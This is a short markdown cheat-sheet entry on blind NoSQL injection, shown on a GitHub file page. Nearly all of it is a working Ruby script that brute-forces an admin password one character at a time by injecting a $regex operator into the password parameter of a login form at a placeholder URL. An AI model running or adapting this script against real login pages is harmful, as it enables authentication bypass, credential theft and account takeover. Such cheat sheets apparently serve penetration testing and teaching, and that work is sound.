Skip to content

Latest commit

 

History

History
34 lines (27 loc) · 860 Bytes

nosql-injection.md

File metadata and controls

34 lines (27 loc) · 860 Bytes

NoSQL injection

Blind NoSQL

Exploit a vulnerable authentication form to find a user's password exploit regexp bruteforce.

GET

require 'httpx'

username = 'admin'
password = ''
url = 'http://example.org/login'
# CHARSET = (?!..?~).to_a # all ASCII printable characters
CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
session = HTTPX.plugin(:persistent)

while true
  CHARSET.each do |c|
    unless GET_EXCLUDE.include?(c)
      payload = "?username=#{username}&password[$regex]=^#{password + c}"
      res = session.get(url + payload)
      if res.body.to_s.match?('Yeah')
        puts "Found one more char : #{password + c}"
        password += c
      end
    end
  end
end

Ref. PATT